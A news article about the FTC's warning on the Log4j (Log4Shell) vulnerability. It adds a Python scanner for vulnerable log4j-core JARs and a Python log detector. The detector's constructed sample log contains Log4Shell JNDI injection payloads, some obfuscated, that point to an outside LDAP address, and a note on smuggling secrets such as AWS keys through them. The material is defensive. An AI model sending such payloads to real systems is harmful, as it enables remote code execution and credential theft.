FTC notifies companies to take measures against Log4j software vulnerability

The Federal Trade Commission (FTC) said on Tuesday that it is critical for companies and their vendors that rely on the Log4j software library to ‘act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action.’

In its latest blog post, the FTC said that when vulnerabilities are discovered and exploited there is a risk of a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm-Leach-Bliley Act, it added.

The federal agency also said that failure to identify and patch instances of the Log4j vulnerability may violate the FTC Act. The vulnerability is being widely exploited by a growing set of attackers, the agency said, and when such vulnerabilities are discovered and exploited, ‘it risks a loss or breach of personal information, financial loss, and other irreversible harms.’

The FTC said that the Log4j vulnerability is part of a broader set of structural issues: Log4j is one of several unheralded but critically important open-source components used across a near-innumerable variety of internet companies. These projects are often created and maintained by volunteers who do not always have adequate resources and personnel for incident response and proactive maintenance, even though their projects are critical to the internet economy, an overall dynamic that ‘the FTC will consider as we work to address the root issues that endanger user security.’

The FTC called on users of the Log4j library to consult the Cybersecurity and Infrastructure Security Agency (CISA) guidance and to update the Log4j package to the most current version available. It also urged companies to make sure remedial steps are taken and to ensure that their practices do not violate the law.

Log4j 2 is an open-source Java logging library developed by the Apache Software Foundation and deployed across enterprise applications and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the vulnerability allows unauthenticated remote code execution through the library’s JNDI lookup feature, and the library itself is embedded in a wide range of consumer and enterprise services, websites, applications, and operational technology (OT) products.

The Log4Shell vulnerability was publicly disclosed on Dec. 9, 2021, and further Log4j vulnerabilities have been identified since. Another Log4j release surfaced online in the last week of 2021, patching a further remote code execution vulnerability (CVE-2021-44832, which requires an attacker who can already modify the logging configuration). Users are now advised to upgrade to Log4j 2.3.2 for Java 6, 2.12.4 for Java 7, or 2.17.1 for Java 8 and later.
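The first step in the remediation the FTC and CISA describe is finding every copy of log4j-core in an estate, including copies buried inside fat JARs, WARs and EARs where a package manager will not see them. The script below is an added example written for this page, not tooling from the FTC, CISA or the Apache project: it walks a directory tree, opens each archive (recursing into nested archives), reads the version from Log4j's Maven `pom.properties`, checks for the `JndiLookup` class, and compares the version against the fixed releases listed above (2.3.2, 2.12.4, 2.17.1). The sample JARs it scans are constructed placeholders that only mimic Log4j's file layout, so it runs offline.

```python
# Added example: find log4j-core JARs (including ones nested inside fat JARs/WARs)
# and compare their version against the fixed releases named in the article.
# Sample JARs are constructed placeholders that mimic Log4j's layout, not real Log4j.
import io
import os
import tempfile
import zipfile

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Minimum fixed version per release line: 2.3.x (Java 6), 2.12.x (Java 7), all others 2.17.1.
FIXED_BY_LINE = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '-rc1' are ignored."""
    nums = []
    for part in text.split(".")[:3]:
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_fixed(version):
    """True only for a 2.x release at or above the fixed version for its line."""
    v = parse_version(version)
    if v[0] != 2:
        return False  # 1.x is end-of-life; unknown strings are flagged for review too
    return v >= FIXED_BY_LINE.get(v[:2], FIXED_DEFAULT)


def inspect_archive(data, path):
    """Return findings for one archive (bytes), recursing into nested archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    version = None
    if POM in names:
        for line in zf.read(POM).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is not None or JNDI in names:
        findings.append({
            "path": path,
            "version": version or "unknown",
            "jndi_lookup_present": JNDI in names,
            "fixed": is_fixed(version or "unknown"),
        })
    for name in names:  # shaded/fat JARs, WARs and EARs nest further archives
        if name.lower().endswith(ARCHIVES):
            findings.extend(inspect_archive(zf.read(name), path + "!/" + name))
    return findings


def scan_tree(root):
    """Walk a directory and inspect every archive found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVES):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), full))
    return findings


def _fake_log4j_core(version):
    """Constructed placeholder jar carrying Log4j's marker files (not real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fixture(root):
    """Constructed tree: two plain jars plus a fat jar nesting an old log4j-core."""
    os.makedirs(os.path.join(root, "lib"))
    for v in ("2.14.1", "2.17.1"):
        with open(os.path.join(root, "lib", "log4j-core-%s.jar" % v), "wb") as fh:
            fh.write(_fake_log4j_core(v))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.12.1.jar", _fake_log4j_core("2.12.1"))
    with open(os.path.join(root, "app.jar"), "wb") as fh:
        fh.write(buf.getvalue())


def demo():
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        status = "OK" if f["fixed"] else "PATCH"
        print("%-8s %-5s jndi=%s %s" % (f["version"], status, f["jndi_lookup_present"], f["path"]))
```

Treat this as a first pass, not proof of absence: it misses classes unpacked into directories, JARs whose `pom.properties` was stripped or whose packages were relocated by a shading plugin, and any copy of the library loaded from outside the scanned tree. The `JndiLookup` check is there because one interim mitigation was to delete that class from the JAR, so a 2.14.x JAR without it is in a different state from one with it; even then, upgrading to the versions named above remains the recommended fix.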

CISA said that all large federal agencies have successfully mitigated the critical Log4j vulnerability. Those agencies faced a Dec. 24, 2021 deadline to remediate it, though CISA has not said whether there were any confirmed breaches of federal agencies through the Log4j vulnerability.

“Agencies have reacted with significant urgency to successfully remediate assets running vulnerable Log4j libraries, even over the holiday season, or to mitigate the majority of affected applications identified that support ‘solution stacks’ that accept data input from the internet,” a CISA spokesperson said in a statement to MeriTalk. “CISA has received status reports from all large agencies, which have either patched or deployed alternate mitigations to address the risk from thousands of internet-connected assets, the focus of the recent Emergency Directive,” it added.

The FTC warning came as Microsoft on Monday updated its earlier guidance on the Log4j vulnerability, cautioning that exploitation attempts and testing remained high through the last weeks of December.

“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” Microsoft said in the guidance. “Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered.”  

At this juncture, according to Microsoft, customers should assume that widely available exploit code and scanning capabilities are a real and present danger to their environments. “Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance,” it added.
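The “additional review” Microsoft recommends usually starts with the web and application logs, and the difficulty there is that the probes rarely contain a literal `${jndi:`; they hide it behind Log4j’s own nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) and URL encoding, so a naive string match misses most of them. The following is an added example written for this page, not part of Microsoft’s guidance or the article: it URL-decodes each line, collapses the obfuscating lookup forms the way Log4j itself would evaluate them, and then matches the trigger. The access-log lines are constructed (RFC 5737 test addresses), not captured traffic.

```python
# Added example: flag Log4Shell probes in access logs after undoing the obfuscations
# attackers use to hide the "${jndi:" trigger. The log lines below are constructed.
import re
from urllib.parse import unquote

# Innermost ${...} expression, i.e. one that contains no further "${".
INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    """Evaluate the lookup forms that only serve obfuscation; leave every other lookup alone."""
    body = match.group(1)
    if ":-" in body:                      # ${::-j}, ${env:NOPE:-j}, ${sys:x:-j} -> default value
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    return match.group(0)                 # real lookups such as ${jndi:...} stay intact


def normalize(text):
    """URL-decode, then collapse nested lookups until the string stops changing."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = INNER.sub(_resolve, text)
    return text


JNDI_TRIGGER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_probes(lines):
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if JNDI_TRIGGER.search(normalized):
            hits.append((number, normalized))
    return hits


# Constructed access-log lines (RFC 5737 test addresses), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:12:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/a}"',
    '203.0.113.10 - - [10/Dec/2021:12:01:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.5%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.11 - - [10/Dec/2021:12:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}${upper:n}di:${::-l}dap://198.51.100.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:01:20 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, normalized in find_probes(SAMPLE_LOG):
        print("line %d: %s" % (number, normalized))
```

The normalizer deliberately leaves lookups such as `${env:AWS_SECRET_ACCESS_KEY}` untouched, so an exfiltration attempt embedded in the JNDI URL survives into the output where an analyst can see what was targeted. A hit here means a probe reached the server, not that it succeeded; as Microsoft’s guidance implies, the follow-up is to check whether the host made an outbound LDAP/RMI/DNS request to the address in the payload and to review the device as potentially compromised.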
